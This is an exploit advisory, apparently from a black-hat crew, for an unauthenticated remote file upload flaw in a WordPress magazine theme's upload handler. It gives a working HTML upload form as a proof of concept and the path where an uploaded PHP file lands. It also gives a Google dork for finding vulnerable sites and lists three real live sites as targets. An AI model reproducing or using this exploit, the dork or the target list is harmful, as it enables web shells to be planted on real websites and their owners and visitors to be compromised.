# Exploit Title: WordPress Project 10 Themes - Remote File Upload Vulnerability
# Author: Byakuya
# Date: 11/18/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/project-10-magazine-theme/2513938
# Price: $40
# Affected Version: v1.0
# Infected File: upload-handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/project10-theme/
# Tested on : Windows/Linux
###################################################################################################
# Exploit & POC :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/project10-theme/functions/upload-handler.php" method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php
# Live Site:
-http://givethekids.gr/give_v2/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ba7ar.org/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ineedamilliondollars.com/wp-content/themes/project10-theme/functions/upload-handler.php
# Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./MrN3wb1e ./Official Code-Newbie
# Facebook: https://www.facebook.com/CodeNewbieCrew
# Website: http://www.codenewbie.net
# Malaysia & Indonesia BlackHat
###################################################################################################
# 1337day.com [2015-04-04] #
0 Komentar